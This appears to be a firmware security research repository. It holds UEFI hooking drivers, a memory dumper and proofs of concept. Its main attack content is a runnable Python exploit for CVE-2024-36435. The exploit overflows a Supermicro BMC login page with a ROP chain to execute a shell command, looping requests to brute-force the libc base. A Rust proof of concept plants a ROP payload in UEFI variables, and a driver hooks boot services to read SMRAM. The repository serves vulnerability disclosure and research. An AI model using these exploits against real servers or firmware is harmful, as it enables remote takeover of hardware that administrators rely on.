├── README.md ├── UEFI ├── usb-config-dxe-poc │ ├── .gitignore │ ├── rust-toolchain.toml │ ├── Cargo.toml │ └── src │ │ └── main.rs ├── DxeSmmHook │ ├── DxeSmmHook.dec │ ├── build.sh │ ├── DxeSmmHookSrc │ │ ├── DxeSmmHook.inf │ │ └── DxeSmmHook.c │ └── DxeSmmHook.dsc ├── README.md ├── DumpMem │ ├── DumpMem.inf │ └── DumpMem.c ├── UsbConfigStartUsbLoopbackEvent │ ├── UsbConfigStartUsbLoopbackEvent.c │ └── UsbConfigStartUsbLoopbackEvent.inf └── GetSetVariableLogger │ ├── GetSetVariableLogger.inf │ └── GetSetVariableLogger.c └── Posix └── Supermicro └── CVE-2024-36435.py /README.md: -------------------------------------------------------------------------------- 1 | # BINARLY Research Tools and PoCs -------------------------------------------------------------------------------- /UEFI/usb-config-dxe-poc/.gitignore: -------------------------------------------------------------------------------- 1 | /target 2 | Cargo.lock 3 | -------------------------------------------------------------------------------- /UEFI/usb-config-dxe-poc/rust-toolchain.toml: -------------------------------------------------------------------------------- 1 | [toolchain] 2 | targets = ["aarch64-unknown-uefi", "i686-unknown-uefi", "x86_64-unknown-uefi"] 3 | -------------------------------------------------------------------------------- /UEFI/DxeSmmHook/DxeSmmHook.dec: -------------------------------------------------------------------------------- 1 | [Defines] 2 | DEC_SPECIFICATION = 1.27 3 | PACKAGE_NAME = DxeSmmHook 4 | PACKAGE_GUID = 3f6e9013-4763-4f37-8010-3143c990c050 5 | PACKAGE_VERSION = 1.00 6 | -------------------------------------------------------------------------------- /UEFI/usb-config-dxe-poc/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "set-vars" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | log = "0.4" 10 | uefi = "0.20" 11 | uefi-services = "0.17" 12 | -------------------------------------------------------------------------------- /UEFI/DxeSmmHook/build.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | ARCH=$(arch) 4 | CWD=$(pwd) 5 | 6 | if [ $ARCH == "aarch64" ] 7 | then 8 | echo "Compiling x86 binaries on an aarch64 machine" 9 | export GCC5_BIN="x86_64-linux-gnu-" 10 | fi 11 | 12 | cd .. 13 | . ./edksetup.sh 14 | build -p DxeSmmHook/DxeSmmHook.dsc -b DEBUG -a X64 -t GCC5 15 | cd $CWD 16 | -------------------------------------------------------------------------------- /UEFI/README.md: -------------------------------------------------------------------------------- 1 | # BINARLY Research Tools and PoCs (UEFI) 2 | 3 | Build Rust tools: 4 | 5 | ``` 6 | cd {tool} 7 | cargo build --release --target aarch64-unknown-uefi 8 | ``` 9 | 10 | Build `DumpMem`: 11 | 12 | ``` 13 | cp -r DumpMem {edk2}/ShellPkg/Application/ 14 | # add ShellPkg/Application/DumpMem/DumpMem.inf to ShellPkg.dsc under [Componenents] 15 | . ./edksetup.sh 16 | build -p ShellPkg/ShellPkg.dsc -b DEBUG -a AARCH64 -t GCC5 17 | ``` 18 | 19 | Dump UEFI firmware on Windows Dev Kit: 20 | 21 | ``` 22 | DumpMem.efi 0x9f000000 0x5d0000 uefi.bin 23 | ``` 24 | -------------------------------------------------------------------------------- /UEFI/DumpMem/DumpMem.inf: -------------------------------------------------------------------------------- 1 | [Defines] 2 | INF_VERSION = 0x00010005 3 | BASE_NAME = DumpMem 4 | FILE_GUID = 6483961f-277d-407e-874b-1edfc5415b62 5 | MODULE_TYPE = UEFI_APPLICATION 6 | VERSION_STRING = 1.0 7 | ENTRY_POINT = UefiMain 8 | 9 | [Sources] 10 | DumpMem.c 11 | 12 | [Packages] 13 | MdePkg/MdePkg.dec 14 | ShellPkg/ShellPkg.dec 15 | 16 | [LibraryClasses] 17 | BaseLib 18 | DebugLib 19 | MemoryAllocationLib 20 | ShellCommandLib 21 | ShellLib 22 | UefiApplicationEntryPoint 23 | UefiLib 24 | UefiBootServicesTableLib 25 | 26 | [Protocols] 27 | gEfiShellParametersProtocolGuid 28 | -------------------------------------------------------------------------------- /UEFI/UsbConfigStartUsbLoopbackEvent/UsbConfigStartUsbLoopbackEvent.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | EFI_STATUS 7 | EFIAPI 8 | UsbConfigStartUsbLoopbackEventEntryPoint(IN EFI_HANDLE ImageHandle, 9 | IN EFI_SYSTEM_TABLE *SystemTable) { 10 | // 0x95808d98 -- UsbConfigStartUsbLoopbackEvent handle 11 | // extracted from BS_Code memory area 12 | EFI_HANDLE *Event = (EFI_HANDLE *)(0x95808d98); 13 | gBS->SignalEvent(Event); 14 | return EFI_SUCCESS; 15 | } 16 | 17 | EFI_STATUS 18 | EFIAPI 19 | UsbConfigStartUsbLoopbackEventUnload(IN EFI_HANDLE ImageHandle) { 20 | return EFI_SUCCESS; 21 | } 22 | -------------------------------------------------------------------------------- /Posix/Supermicro/CVE-2024-36435.py: -------------------------------------------------------------------------------- 1 | # CVE-2024-36435 – Buffer overflow vulnerability in Supermicro BMC IPMI firmware due to unchecked length of user-supplied value 2 | 3 | import base64 4 | import requests 5 | 6 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 7 | 8 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 9 | 10 | # set target and command values 11 | target = "https://192.168.10.53:443/cgi/login.cgi" 12 | command = "touch /tmp/BRLY" 13 | 14 | libc_base = 0x76283000 # we try to guess 15 | gadget_1_offset = 0x000D8874 # pop {r0, r1, r2, r3, fp, pc}; 16 | gadget_2_offset = 0x001026D4 # mov r0, sp; blx r3; 17 | system_offset = 0x0003C4D4 18 | 19 | print(f"Target: {target}") 20 | print(f"Command: {command}") 21 | print() 22 | print(f"libc_base: {libc_base:#x}") 23 | print(f"gadget_1_offset: {gadget_1_offset:#x}") 24 | print(f"gadget_2_offset: {gadget_2_offset:#x}") 25 | print(f"system_offset: {system_offset:#x}") 26 | print() 27 | 28 | 29 | payload = base64.b64encode( 30 | b"\x00" * 456 31 | + int.to_bytes(libc_base + gadget_1_offset, 4, "little") # gadget_1 32 | + b"\x00" * 12 33 | + int.to_bytes(libc_base + system_offset, 4, "little") # system 34 | + b"\x00" * 4 35 | + int.to_bytes(libc_base + gadget_2_offset, 4, "little") # gadget_2 36 | + command.encode() 37 | ).decode() 38 | 39 | data = f"name={payload}&pwd=&check=1" 40 | 41 | print("Sending requests...") 42 | i = 0 43 | while True: 44 | print(f"Request: '{i}'") 45 | r = requests.post(target, data=data, verify=False) 46 | i += 1 47 | -------------------------------------------------------------------------------- /UEFI/DxeSmmHook/DxeSmmHookSrc/DxeSmmHook.inf: -------------------------------------------------------------------------------- 1 | [Defines] 2 | INF_VERSION = 1.27 3 | BASE_NAME = DxeSmmHook 4 | FILE_GUID = 1e8fb50f-e7b1-4a10-ad8d-065b0f35641e 5 | MODULE_TYPE = DXE_RUNTIME_DRIVER 6 | VERSION_STRING = 1.0 7 | ENTRY_POINT = DxeSmmHookEntryPoint 8 | UNLOAD_IMAGE = DxeSmmHookUnload 9 | 10 | [Sources] 11 | DxeSmmHook.c 12 | 13 | [Packages] 14 | MdePkg/MdePkg.dec 15 | 16 | [LibraryClasses] 17 | UefiDriverEntryPoint 18 | UefiLib 19 | UefiRuntimeLib 20 | 21 | [Guids] 22 | 23 | [Depex] 24 | TRUE 25 | 26 | [BuildOptions.common.DXE_RUNTIME_DRIVER] 27 | # Detect use of deprecated interfaces if any. 28 | MSFT:*_*_*_CC_FLAGS = -D DISABLE_NEW_DEPRECATED_INTERFACES 29 | 30 | # Remove DebugLib library instances (ASSERT and such) from the RELEASE binary. 31 | # https://github.com/tianocore-docs/edk2-UefiDriverWritersGuide/blob/master/31_testing_and_debugging_uefi_drivers/314_debugging_code_statements/3141_configuring_debuglib_with_edk_ii.md 32 | MSFT:RELEASE_*_*_CC_FLAGS = -D MDEPKG_NDEBUG 33 | 34 | # By default, certain meta-data in the PE header is zeroed out to increase 35 | # compression ratio. Some of those information can be helpful for a debugger, 36 | # for example, to reconstruct stack trace. Leave it for such cases. See also, 37 | # https://edk2-docs.gitbooks.io/edk-ii-basetools-user-guides/content/GenFw.html 38 | MSFT:*_*_X64_GENFW_FLAGS = --keepexceptiontable --keepzeropending --keepoptionalheader 39 | -------------------------------------------------------------------------------- /UEFI/GetSetVariableLogger/GetSetVariableLogger.inf: -------------------------------------------------------------------------------- 1 | [Defines] 2 | INF_VERSION = 1.27 3 | BASE_NAME = GetSetVariableLogger 4 | FILE_GUID = a06652d9-9e49-4fe0-a8e2-d2e16990c752 5 | MODULE_TYPE = DXE_RUNTIME_DRIVER 6 | VERSION_STRING = 1.0 7 | ENTRY_POINT = GetSetVariableLoggerEntryPoint 8 | UNLOAD_IMAGE = GetSetVariableLoggerUnload 9 | 10 | [Sources] 11 | GetSetVariableLogger.c 12 | 13 | [Packages] 14 | MdePkg/MdePkg.dec 15 | 16 | [LibraryClasses] 17 | UefiDriverEntryPoint 18 | UefiLib 19 | UefiRuntimeLib 20 | 21 | [Guids] 22 | 23 | [Depex] 24 | TRUE 25 | 26 | [BuildOptions.common.DXE_RUNTIME_DRIVER] 27 | # Detect use of deprecated interfaces if any. 28 | MSFT:*_*_*_CC_FLAGS = -D DISABLE_NEW_DEPRECATED_INTERFACES 29 | 30 | # Remove DebugLib library instances (ASSERT and such) from the RELEASE binary. 31 | # https://github.com/tianocore-docs/edk2-UefiDriverWritersGuide/blob/master/31_testing_and_debugging_uefi_drivers/314_debugging_code_statements/3141_configuring_debuglib_with_edk_ii.md 32 | MSFT:RELEASE_*_*_CC_FLAGS = -D MDEPKG_NDEBUG 33 | 34 | # By default, certain meta-data in the PE header is zeroed out to increase 35 | # compression ratio. Some of those information can be helpful for a debugger, 36 | # for example, to reconstruct stack trace. Leave it for such cases. See also, 37 | # https://edk2-docs.gitbooks.io/edk-ii-basetools-user-guides/content/GenFw.html 38 | MSFT:*_*_X64_GENFW_FLAGS = --keepexceptiontable --keepzeropending --keepoptionalheader 39 | -------------------------------------------------------------------------------- /UEFI/UsbConfigStartUsbLoopbackEvent/UsbConfigStartUsbLoopbackEvent.inf: -------------------------------------------------------------------------------- 1 | [Defines] 2 | INF_VERSION = 1.27 3 | BASE_NAME = UsbConfigStartUsbLoopbackEvent 4 | FILE_GUID = 6330e54f-f04f-4e15-86b4-ddd98275b57c 5 | MODULE_TYPE = DXE_RUNTIME_DRIVER 6 | VERSION_STRING = 1.0 7 | ENTRY_POINT = UsbConfigStartUsbLoopbackEventEntryPoint 8 | UNLOAD_IMAGE = UsbConfigStartUsbLoopbackEventUnload 9 | 10 | [Sources] 11 | UsbConfigStartUsbLoopbackEvent.c 12 | 13 | [Packages] 14 | MdePkg/MdePkg.dec 15 | 16 | [LibraryClasses] 17 | UefiDriverEntryPoint 18 | UefiLib 19 | UefiRuntimeLib 20 | 21 | [Guids] 22 | 23 | [Depex] 24 | TRUE 25 | 26 | [BuildOptions.common.DXE_RUNTIME_DRIVER] 27 | # Detect use of deprecated interfaces if any. 28 | MSFT:*_*_*_CC_FLAGS = -D DISABLE_NEW_DEPRECATED_INTERFACES 29 | 30 | # Remove DebugLib library instances (ASSERT and such) from the RELEASE binary. 31 | # https://github.com/tianocore-docs/edk2-UefiDriverWritersGuide/blob/master/31_testing_and_debugging_uefi_drivers/314_debugging_code_statements/3141_configuring_debuglib_with_edk_ii.md 32 | MSFT:RELEASE_*_*_CC_FLAGS = -D MDEPKG_NDEBUG 33 | 34 | # By default, certain meta-data in the PE header is zeroed out to increase 35 | # compression ratio. Some of those information can be helpful for a debugger, 36 | # for example, to reconstruct stack trace. Leave it for such cases. See also, 37 | # https://edk2-docs.gitbooks.io/edk-ii-basetools-user-guides/content/GenFw.html 38 | MSFT:*_*_X64_GENFW_FLAGS = --keepexceptiontable --keepzeropending --keepoptionalheader 39 | -------------------------------------------------------------------------------- /UEFI/DxeSmmHook/DxeSmmHook.dsc: -------------------------------------------------------------------------------- 1 | [Defines] 2 | DSC_SPECIFICATION = 1.28 3 | PLATFORM_NAME = DxeSmmHook 4 | PLATFORM_GUID = 0b79e762-783e-4448-b8e1-ca9659e9371a 5 | PLATFORM_VERSION = 1.00 6 | OUTPUT_DIRECTORY = Build/DxeSmmHook 7 | SUPPORTED_ARCHITECTURES = X64 8 | BUILD_TARGETS = DEBUG|RELEASE|NOOPT 9 | SKUID_IDENTIFIER = DEFAULT 10 | 11 | [Components] 12 | DxeSmmHook/DxeSmmHookSrc/DxeSmmHook.inf 13 | 14 | [LibraryClasses] 15 | UefiRuntimeLib|MdePkg/Library/UefiRuntimeLib/UefiRuntimeLib.inf 16 | UefiRuntimeServicesTableLib|MdePkg/Library/UefiRuntimeServicesTableLib/UefiRuntimeServicesTableLib.inf 17 | DevicePathLib|MdePkg/Library/UefiDevicePathLib/UefiDevicePathLib.inf 18 | UefiBootServicesTableLib|MdePkg/Library/UefiBootServicesTableLib/UefiBootServicesTableLib.inf 19 | MemoryAllocationLib|MdePkg/Library/UefiMemoryAllocationLib/UefiMemoryAllocationLib.inf 20 | RegisterFilterLib|MdePkg/Library/RegisterFilterLibNull/RegisterFilterLibNull.inf 21 | BaseMemoryLib|MdePkg/Library/BaseMemoryLib/BaseMemoryLib.inf 22 | PcdLib|MdePkg/Library/BasePcdLibNull/BasePcdLibNull.inf 23 | BaseLib|MdePkg/Library/BaseLib/BaseLib.inf 24 | DebugLib|MdePkg/Library/BaseDebugLibNull/BaseDebugLibNull.inf 25 | DebugPrintErrorLevelLib|MdePkg/Library/BaseDebugPrintErrorLevelLib/BaseDebugPrintErrorLevelLib.inf 26 | PrintLib|MdePkg/Library/BasePrintLib/BasePrintLib.inf 27 | UefiDriverEntryPoint|MdePkg/Library/UefiDriverEntryPoint/UefiDriverEntryPoint.inf 28 | UefiLib|MdePkg/Library/UefiLib/UefiLib.inf 29 | !if $(TARGET) == RELEASE 30 | DebugLib|MdePkg/Library/BaseDebugLibNull/BaseDebugLibNull.inf 31 | !else 32 | !ifdef $(DEBUG_ON_SERIAL_PORT) 33 | IoLib|MdePkg/Library/BaseIoLibIntrinsic/BaseIoLibIntrinsicSev.inf 34 | SerialPortLib|PcAtChipsetPkg/Library/SerialIoLib/SerialIoLib.inf 35 | DebugLib|MdePkg/Library/BaseDebugLibSerialPort/BaseDebugLibSerialPort.inf 36 | !else 37 | DebugLib|MdePkg/Library/UefiDebugLibConOut/UefiDebugLibConOut.inf 38 | !endif 39 | !endif 40 | 41 | [PcdsFixedAtBuild] 42 | # Define DEBUG_ERROR | DEBUG_VERBOSE | DEBUG_INFO | DEBUG_WARN to enable 43 | # logging at those levels. Also, define DEBUG_PROPERTY_ASSERT_DEADLOOP_ENABLED 44 | # and such. Assertion failure will call CpuDeadLoop. 45 | # https://github.com/tianocore/tianocore.github.io/wiki/EDK-II-Debugging 46 | gEfiMdePkgTokenSpaceGuid.PcdDebugPrintErrorLevel|0x80400042 47 | gEfiMdePkgTokenSpaceGuid.PcdDebugPropertyMask|0x2f 48 | -------------------------------------------------------------------------------- /UEFI/usb-config-dxe-poc/src/main.rs: -------------------------------------------------------------------------------- 1 | #![no_main] 2 | #![no_std] 3 | 4 | use uefi::guid; 5 | use uefi::table::runtime::{VariableAttributes, VariableVendor}; 6 | 7 | use uefi::prelude::*; 8 | 9 | #[allow(dead_code)] 10 | fn usb_config_dxe_poc(system_table: SystemTable) { 11 | let rt = system_table.runtime_services(); 12 | 13 | // -0000000000000019 Value DCB ? 14 | // ... 15 | // +0000000000000008 16 | // +0000000000000008 ; end of stack variables 17 | 18 | let attrs = VariableAttributes::NON_VOLATILE 19 | | VariableAttributes::BOOTSERVICE_ACCESS 20 | | VariableAttributes::RUNTIME_ACCESS; 21 | let vendor_guid = VariableVendor(guid!("882f8c2b-9646-435f-8de5-f208ff80c1bd")); 22 | 23 | let name1 = cstr16!("UsbConfigPrimaryPort"); 24 | 25 | // aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa{Gadget1} 26 | // bbbbbbbb{gST->ConOut->OutputString}00000000{Gadget2} 27 | // cccccccccccccccccccccccc{gST->ConOut}1111111111111111{WritableAddressX29}{Gadget3} 28 | // dddddddddddddddddddd{Message}{InfiniteLoopAddr} 29 | 30 | let con_out: [u8; 8] = 0x9439f320u64.to_le_bytes(); 31 | let writable_address_x29: [u8; 8] = 0x8e400000u64.to_le_bytes(); 32 | let con_out_output_string: [u8; 8] = 0x92fd8cc8u64.to_le_bytes(); 33 | 34 | // ASN1X509Dxe-c2f9a4f5-f7b4-43e7-ba99-5ea804cc103a.dxe (BS_Code offset: 0x60d000) 35 | // 0x0000000000004ae0: ldr x8, [sp, #8]; cbz x8, #0x4ae0; ldp x29, x30, [sp, #0x10]; add sp, sp, #0x20; ret; 36 | let gadget1: [u8; 8] = 0x9a904ae0u64.to_le_bytes(); 37 | 38 | // AcpiPlatform-07598dfc-d5ec-4f00-8897-ab10426cb644.dxe (BS_Code offset: 0x6d2000) 39 | // 0x00000000000047cc: ldr x0, [sp, #0x18]; ldp x29, x30, [sp, #0x30]; add sp, sp, #0x40; ret; 40 | let gadget2: [u8; 8] = 0x9a9c97ccu64.to_le_bytes(); 41 | 42 | // AcpiPlatform-07598dfc-d5ec-4f00-8897-ab10426cb644.dxe (BS_Code offset: 0x6d2000) 43 | // 0x000000000000aaf0: add x1, sp, #0x14; blr x8; 44 | let gadget3: [u8; 8] = 0x9a9cfaf0u64.to_le_bytes(); 45 | 46 | // AcpiPlatform-07598dfc-d5ec-4f00-8897-ab10426cb644.dxe (BS_Code offset: 0x6d2000) 47 | // .text:00000000000010D8 InfiniteLoop 48 | let infinite_loop: [u8; 8] = 0x9a9c60d8u64.to_le_bytes(); 49 | 50 | let message: &[u8; 52] = b"\r\x00\n\x00S\x00u\x00c\x00c\x00e\x00s\x00s\x00f\x00u\x00l\x00l\x00y\x00\x20\x00e\x00x\x00p\x00l\x00o\x00i\x00t\x00e\x00d\x00\x21\x00\x00\x00"; 51 | 52 | let mut value: [u8; 217] = [0; 217]; 53 | value[..33].copy_from_slice(b"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"); 54 | value[33..41].copy_from_slice(&gadget1[..]); 55 | value[41..49].copy_from_slice(b"bbbbbbbb"); 56 | value[49..57].copy_from_slice(&con_out_output_string[..]); 57 | value[57..65].copy_from_slice(b"00000000"); 58 | value[65..73].copy_from_slice(&gadget2[..]); 59 | value[73..97].copy_from_slice(b"cccccccccccccccccccccccc"); 60 | value[97..105].copy_from_slice(&con_out[..]); 61 | value[105..121].copy_from_slice(b"1111111111111111"); 62 | value[121..129].copy_from_slice(&writable_address_x29[..]); 63 | value[129..137].copy_from_slice(&gadget3[..]); 64 | value[137..157].copy_from_slice(b"dddddddddddddddddddd"); 65 | value[157..209].copy_from_slice(message); 66 | value[209..].copy_from_slice(&infinite_loop[..]); 67 | 68 | rt.set_variable(name1, &vendor_guid, attrs, &value) 69 | .expect("failed to set variable"); 70 | 71 | let name2 = cstr16!("UsbConfigSecondaryPort"); 72 | rt.set_variable(name2, &vendor_guid, attrs, &value) 73 | .expect("failed to set variable"); 74 | } 75 | 76 | #[entry] 77 | fn main(_image_handle: Handle, mut system_table: SystemTable) -> Status { 78 | uefi_services::init(&mut system_table).unwrap(); 79 | 80 | usb_config_dxe_poc(system_table); 81 | 82 | Status::SUCCESS 83 | } 84 | -------------------------------------------------------------------------------- /UEFI/DxeSmmHook/DxeSmmHookSrc/DxeSmmHook.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | #define SEC_TO_MICRO(s) ((s)*1000000) 9 | 10 | EFI_LOCATE_PROTOCOL gLocateProtocolOld; 11 | UINTN *gSmramBase = (UINTN *)0xce000000; 12 | UINTN gSig = (UINTN)0x34365f33534d4d53; 13 | UINT8 gContinue = 0; 14 | 15 | static CONST CHAR8 mHex[] = {'0', '1', '2', '3', '4', '5', '6', '7', 16 | '8', '9', 'A', 'B', 'C', 'D', 'E', 'F'}; 17 | 18 | // SMRAM header for demo 19 | UINT8 gSmramContent[256] = {0}; 20 | 21 | static VOID HexDump(IN UINTN Indent, IN UINTN Offset, IN UINTN DataSize, 22 | IN VOID *UserData) { 23 | UINT8 *Data; 24 | CHAR8 Val[50]; 25 | CHAR8 Str[20]; 26 | UINT8 TempByte; 27 | UINTN Size; 28 | UINTN Index; 29 | 30 | Data = UserData; 31 | while (DataSize != 0) { 32 | Size = 16; 33 | if (Size > DataSize) { 34 | Size = DataSize; 35 | } 36 | 37 | for (Index = 0; Index < Size; Index += 1) { 38 | TempByte = Data[Index]; 39 | Val[Index * 3 + 0] = mHex[TempByte >> 4]; 40 | Val[Index * 3 + 1] = mHex[TempByte & 0xF]; 41 | Val[Index * 3 + 2] = (CHAR8)((Index == 7) ? '-' : ' '); 42 | Str[Index] = (CHAR8)((TempByte < ' ' || TempByte > 'z') ? '.' : TempByte); 43 | } 44 | 45 | Val[Index * 3] = 0; 46 | Str[Index] = 0; 47 | DebugPrint(DEBUG_INFO, "%*a%08X: %-48a *%a*\r\n", Indent, "", Offset, Val, 48 | Str); 49 | 50 | Data += Size; 51 | Offset += Size; 52 | DataSize -= Size; 53 | } 54 | } 55 | 56 | VOID EFIAPI CheckSmramAccess() { 57 | if (gContinue) { 58 | return; 59 | } 60 | 61 | UINTN Sig = *gSmramBase; 62 | if (Sig == gSig) { 63 | CopyMem(&gSmramContent, (UINT8 *)gSmramBase, 256); 64 | } 65 | 66 | VOID *EfiSimpleTextOutProtocolGuid = NULL; 67 | EFI_STATUS Status = 68 | gLocateProtocolOld(&gEfiSimpleTextOutProtocolGuid, NULL, 69 | (VOID **)&EfiSimpleTextOutProtocolGuid); 70 | if (Status == EFI_SUCCESS) { 71 | gBS->Stall(SEC_TO_MICRO(5)); 72 | DebugPrint(DEBUG_INFO, "Can read and write SMRAM:\n"); 73 | HexDump(2, (UINTN)gSmramBase, 256, (UINT8 *)&gSmramContent); 74 | UINTN Sec = 3; 75 | DebugPrint(DEBUG_INFO, "\nContinue in "); 76 | while (Sec >= 2) { 77 | DebugPrint(DEBUG_INFO, "%d, ", Sec); 78 | gBS->Stall(SEC_TO_MICRO(1)); 79 | --Sec; 80 | } 81 | DebugPrint(DEBUG_INFO, "1\n"); 82 | gBS->Stall(SEC_TO_MICRO(1)); 83 | gContinue = 1; 84 | } 85 | } 86 | 87 | EFI_STATUS 88 | EFIAPI 89 | LocateProtocolNew(IN EFI_GUID *Protocol, IN VOID *Registration OPTIONAL, 90 | OUT VOID **Interface) { 91 | EFI_STATUS Status = gLocateProtocolOld(Protocol, Registration, Interface); 92 | CheckSmramAccess(); 93 | return Status; 94 | } 95 | 96 | VOID EFIAPI LocateProtocolSetupHook() { 97 | // Hook LocateProtocol 98 | gLocateProtocolOld = (EFI_LOCATE_PROTOCOL)gBS->LocateProtocol; 99 | DebugPrint(DEBUG_INFO, "gBS->LocateProtocol() address = %p\n", 100 | gLocateProtocolOld); 101 | gBS->LocateProtocol = (EFI_LOCATE_PROTOCOL)LocateProtocolNew; 102 | } 103 | 104 | EFI_STATUS 105 | EFIAPI 106 | DxeSmmHookEntryPoint(IN EFI_HANDLE ImageHandle, 107 | IN EFI_SYSTEM_TABLE *SystemTable) { 108 | DebugPrint(DEBUG_INFO, "DxeSmmHook driver loaded, gBS = %p\n", gBS); 109 | 110 | LocateProtocolSetupHook(); 111 | 112 | return EFI_SUCCESS; 113 | } 114 | 115 | EFI_STATUS 116 | EFIAPI 117 | DxeSmmHookUnload(IN EFI_HANDLE ImageHandle) { return EFI_SUCCESS; } 118 | -------------------------------------------------------------------------------- /UEFI/GetSetVariableLogger/GetSetVariableLogger.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | EFI_GET_VARIABLE gGetVariableOld; 9 | EFI_SET_VARIABLE gSetVariableOld; 10 | 11 | static CONST CHAR8 mHex[] = {'0', '1', '2', '3', '4', '5', '6', '7', 12 | '8', '9', 'A', 'B', 'C', 'D', 'E', 'F'}; 13 | 14 | static VOID HexDump(IN UINTN Indent, IN UINTN Offset, IN UINTN DataSize, 15 | IN VOID *UserData) { 16 | UINT8 *Data; 17 | CHAR8 Val[50]; 18 | CHAR8 Str[20]; 19 | UINT8 TempByte; 20 | UINTN Size; 21 | UINTN Index; 22 | 23 | Data = UserData; 24 | while (DataSize != 0) { 25 | Size = 16; 26 | if (Size > DataSize) { 27 | Size = DataSize; 28 | } 29 | 30 | for (Index = 0; Index < Size; Index += 1) { 31 | TempByte = Data[Index]; 32 | Val[Index * 3 + 0] = mHex[TempByte >> 4]; 33 | Val[Index * 3 + 1] = mHex[TempByte & 0xF]; 34 | Val[Index * 3 + 2] = (CHAR8)((Index == 7) ? '-' : ' '); 35 | Str[Index] = (CHAR8)((TempByte < ' ' || TempByte > 'z') ? '.' : TempByte); 36 | } 37 | 38 | Val[Index * 3] = 0; 39 | Str[Index] = 0; 40 | DebugPrint(DEBUG_INFO, "%*a%08X: %-48a *%a*\r\n", Indent, "", Offset, Val, 41 | Str); 42 | 43 | Data += Size; 44 | Offset += Size; 45 | DataSize -= Size; 46 | } 47 | } 48 | 49 | VOID EFIAPI GetVariableLogDetails(EFI_STATUS Status, CHAR16 *VariableName, 50 | EFI_GUID *VendorGuid, UINTN DataSize) { 51 | DebugPrint(DEBUG_INFO, 52 | "[gRT->GetVariable()] VariableName: %s, VendorGuid: %g, DataSize: " 53 | "0x%llx, Status: %r\n", 54 | VariableName, VendorGuid, DataSize, Status); 55 | } 56 | 57 | VOID EFIAPI SetVariableLogDetails(EFI_STATUS Status, CHAR16 *VariableName, 58 | EFI_GUID *VendorGuid, UINTN DataSize) { 59 | DebugPrint(DEBUG_INFO, 60 | "[gRT->SetVariable()] Name: %s, VendorGuid: %g, DataSize: 0x%llx, " 61 | "Status: %r\n", 62 | VariableName, VendorGuid, DataSize, Status); 63 | } 64 | 65 | EFI_STATUS 66 | EFIAPI 67 | GetVariableNew(IN CHAR16 *VariableName, IN EFI_GUID *VendorGuid, 68 | OUT UINT32 *Attributes OPTIONAL, IN OUT UINTN *DataSize, 69 | OUT VOID *Data) { 70 | EFI_STATUS Status = 71 | gGetVariableOld(VariableName, VendorGuid, Attributes, DataSize, Data); 72 | GetVariableLogDetails(Status, VariableName, VendorGuid, *DataSize); 73 | if (Data && !StrCmp(VariableName, L"UsbConfigSecondaryPort")) { 74 | HexDump(2, (UINTN)Data - 256, 512, Data - 256); 75 | } 76 | return Status; 77 | } 78 | 79 | EFI_STATUS 80 | EFIAPI 81 | SetVariableNew(IN CHAR16 *VariableName, IN EFI_GUID *VendorGuid, 82 | IN UINT32 Attributes, IN UINTN DataSize, IN VOID *Data) { 83 | EFI_STATUS Status = 84 | gSetVariableOld(VariableName, VendorGuid, Attributes, DataSize, Data); 85 | SetVariableLogDetails(Status, VariableName, VendorGuid, DataSize); 86 | return Status; 87 | } 88 | 89 | VOID EFIAPI GetSetVariableHook() { 90 | // Hook GetVariable and SetVariable 91 | gGetVariableOld = (EFI_GET_VARIABLE)gRT->GetVariable; 92 | gSetVariableOld = (EFI_SET_VARIABLE)gRT->SetVariable; 93 | DebugPrint(DEBUG_INFO, "gRT->GetVariable() address = %p\n", gGetVariableOld); 94 | DebugPrint(DEBUG_INFO, "gRT->SetVariable() address = %p\n", gSetVariableOld); 95 | gRT->GetVariable = (EFI_GET_VARIABLE)GetVariableNew; 96 | gRT->SetVariable = (EFI_SET_VARIABLE)SetVariableNew; 97 | } 98 | 99 | EFI_STATUS 100 | EFIAPI 101 | GetSetVariableLoggerEntryPoint(IN EFI_HANDLE ImageHandle, 102 | IN EFI_SYSTEM_TABLE *SystemTable) { 103 | DebugPrint(DEBUG_INFO, "GetSetVariableLogger driver loaded\n"); 104 | 105 | GetSetVariableHook(); 106 | return EFI_SUCCESS; 107 | } 108 | 109 | EFI_STATUS 110 | EFIAPI 111 | GetSetVariableLoggerUnload(IN EFI_HANDLE ImageHandle) { return EFI_SUCCESS; } 112 | -------------------------------------------------------------------------------- /UEFI/DumpMem/DumpMem.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #define BLOCK_SIZE 0x10000 7 | 8 | static CONST CHAR8 mHex[] = {'0', '1', '2', '3', '4', '5', '6', '7', 9 | '8', '9', 'A', 'B', 'C', 'D', 'E', 'F'}; 10 | 11 | static UINTN Argc; 12 | static CHAR16 **Argv; 13 | 14 | static VOID HexDump(IN UINTN Indent, IN UINTN Offset, IN UINTN DataSize, 15 | IN VOID *UserData) { 16 | UINT8 *Data; 17 | 18 | CHAR8 Val[50]; 19 | 20 | CHAR8 Str[20]; 21 | 22 | UINT8 TempByte; 23 | UINTN Size; 24 | UINTN Index; 25 | 26 | Data = UserData; 27 | while (DataSize != 0) { 28 | Size = 16; 29 | if (Size > DataSize) { 30 | Size = DataSize; 31 | } 32 | 33 | for (Index = 0; Index < Size; Index += 1) { 34 | TempByte = Data[Index]; 35 | Val[Index * 3 + 0] = mHex[TempByte >> 4]; 36 | Val[Index * 3 + 1] = mHex[TempByte & 0xF]; 37 | Val[Index * 3 + 2] = (CHAR8)((Index == 7) ? '-' : ' '); 38 | Str[Index] = (CHAR8)((TempByte < ' ' || TempByte > 'z') ? '.' : TempByte); 39 | } 40 | 41 | Val[Index * 3] = 0; 42 | Str[Index] = 0; 43 | Print(L"%*a%08X: %-48a *%a*\r\n", Indent, "", Offset, Val, Str); 44 | 45 | Data += Size; 46 | Offset += Size; 47 | DataSize -= Size; 48 | } 49 | } 50 | 51 | static EFI_STATUS 